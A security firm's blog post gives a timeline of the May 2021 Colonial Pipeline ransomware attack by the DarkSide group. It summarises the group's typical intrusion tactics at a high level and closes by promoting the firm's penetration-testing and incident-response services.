On Friday May 7th Colonial Pipeline suffered a cyberattack involving ransomware, causing them to shutdown their IT systems and temporarily pause production on a majority of their pipelines. Additional details of the attack are still coming out each day, but here is a current timeline of events and details of how the hacker group, DarkSide, has carried out its attacks based on publicly available information.
May 6th
Colonial Pipeline networks are breached, 100GB of data is stolen and computers are encrypted with ransomware.
May 7th
Colonial Pipeline paid $4.4 million to DarkSide hacking group to decrypt their infrastructure.
May 8th
Colonial Pipeline, along with U.S. Government organizations and U.S. companies take systems offline that were in control by the hackers.
Colonial Pipeline issues statement on attack stating they have been victims of ransomware and have engaged a third-party cybersecurity firm and alerted law enforcement. Source:Colonial Pipeline Statement
May 9th
Colonial Pipeline issues second statement giving an update of their investigation into the attack and the status of their pipeline operations. Source: Colonial Pipeline Statement
May 10th
FBI issues statement confirming DarkSide is the responsible party for the hack.
Colonial Pipeline issues a statement that their goal is to substantially restore service by the end of the week.
Colonial Pipeline manually operates a line from Greensboro, NC to Woodbine, MD for a limited period of time, but other main lines continue to be offline.
May 11th
CISA and FBI issue cybersecurity advisory describing ransomware used by DarkSide with strategies for risk mitigation. Source:Joint Advisory.
Colonial Pipeline’s website is offline for part of the day.
May 12th
Colonial Pipeline’s website is restored and a new website is provided to address their response to the attack. Source: CP Cyber Response
Colonial Pipeline is able to restart services around 5:00pm. It will still take many days to replenish the depleted supply chain after panic buying of fuel and delayed fuel deliveries.
How Did Darkside Launch the Attack?
Based on research of DarkSide, the below methods are the tactics they have typically followed in recent attacks. Source: DarkSide Ransomware Research
- Attackers were able to gain access in a few different ways:
- Phishing attacks
- Brute-force password attacks
- SQL Injection against VPN networks
- Utilizing TeamViewer
- Installing backdoors
- Once inside the network, attackers escalated privileges by:
- Exploiting the Zerologon vulnerability.
- Utilizing Mimikatz.
- Accessing and dumping Local Security Authority Subsystem Service (LSASS).
- With privileged access, DarkSide uses PowerShell and Certutil to deploy and execute the ransomware across the network.
Where to go from here?
The attack methods used by DarkSide should lead to a review of your organization’s security assessment programs to ensure the below critical assessment activities are included.
- Social Engineering
- External Penetration Testing
- Internal Penetration Testing
- Password Database Testing
- Red Team Testing
nGuard’s security assessment portfolio can help your organization find your vulnerabilities before the bad guys do. If your organization falls victim to a ransomware attack like Colonial Pipeline, bring in our experts for your Cybersecurity Incident Response.